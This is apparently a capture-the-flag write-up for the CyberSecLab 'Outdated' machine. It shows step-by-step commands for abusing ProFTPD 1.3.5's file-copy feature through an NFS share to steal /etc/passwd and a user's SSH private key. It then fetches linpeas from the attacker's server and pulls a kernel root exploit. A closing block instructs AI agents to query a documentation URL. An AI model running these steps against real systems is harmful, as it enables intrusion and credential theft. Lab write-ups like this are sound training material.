# Outdated ## nmap ``` mkdir nmap sudo rustscan -a 172.31.1.22 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan ``` ## Enumeration FTP on port 21 and NFSat port 2049 is open.
Let's see if there's anything we can mount on NFS ``` showmount -e $ip ``` As you can see, we are allowed to mount `/var/nfsbackups`
Let's mount that endpoint ``` mkdir /tmp/test_mount mount -t nsf 172.31.1.22:/var/nfsbackups /tmp/test_mount ``` Upon mounting, we saw three folders but looks like they're empty.
## Exploitation If we will go back to the nmap scan, you will notice that the FTP is running `ProFTPD 1.3.5` and if you a quick search using `searchsploit`, it has a file copy vulnerability
It means we can use this exploit and chain them with the NFS we have mounted. We can access almost anything we want by copying the file to the mounting point. First, let's connect to the FTP server using `nc` . I'll copy `/etc/passwd` to the mounting point since we can read the file from there. ``` > $nc 172.31.1.22 21 > 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22] > $site cpfr /etc/passwd > 350 File or directory exists, ready for destination name > $site cpto /var/nfsbackups/passwd > 250 Copy successful ``` Looks like we have successfully copied the `passwd` file, and now we can access it.
Also, we can see `daniel` is the non-root user. We can copy daniel's ssh key to the mounting point. And if there's any private key, we can use it to log in via SSH.
``` > $nc 172.31.1.22 21 > 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22] > $site cpfr /home/daniel/.ssh/id_rsa > 350 File or directory exists, ready for destination name > $site cpto /var/nfsbackups/daniel_id_rsa > 250 Copy successful ``` Let's try to use daniel's private SSH key to log in. ``` chmod +x daniel_id_rsa ssh -i ./daniel_id_rsa daniel@172.31.1.22 ``` We have successfully logged in as daniel. Sweet :D
## Post Exploitation First, let's transfer `linpeas.sh` ``` (base) [psdon@arch outdated]$ cd /opt/peass/linPEAS/ (base) [psdon@arch linPEAS]$ ls builder images linpeas.sh README.md (base) [psdon@arch linPEAS]$ sudo python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` You can find the machine IP address by executing the following. ``` (base) [psdon@arch outdated]$ ip a | grep tun 5: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qle n 500 inet 10.10.0.41/24 scope global tun0 ``` Then transfer the script using `wget` ``` daniel@outdated:~$ wget http://10.10.0.41/linpeas.sh --2021-09-07 14:38:02-- http://10.10.0.41/linpeas.sh Connecting to 10.10.0.41:80... connected. HTTP request sent, awaiting response... 200 OK Length: 458110 (447K) [application/x-sh] Saving to: `linpeas.sh' 100%[===========================================================================================================================================================================>] 458,110 335K/s in 1.3s 2021-09-07 14:38:04 (335 KB/s) - `linpeas.sh' saved [458110/458110] daniel@outdated:~$ chmod +x linpeas.sh ``` And now we can run `linpeas.sh` ``` daniel@outdated:~$ ./linpeas.sh ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------| | Become a Patreon : https://www.patreon.com/peass | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli & makikvues | |---------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------/ linpeas-ng by carlospolop ``` Right out of the bat, you will notice the kernel version is `3.13.0-32-generic`
I found out this kernel version is vulnerable and can lead us to privilege escalation. And we can compile the exploit since `gcc` is installed on the target machine.
## Privilege Escalation First, mirror the exploit to our local machine and transfer it to the target machine. ``` searchsploit -m linux/local/37292.c mv 37292.c exploit.c ```
Compile the exploit, and enjoy your root privilege :D
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://psdon.gitbook.io/hackworld/writeup/cyberseclab/outdated.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.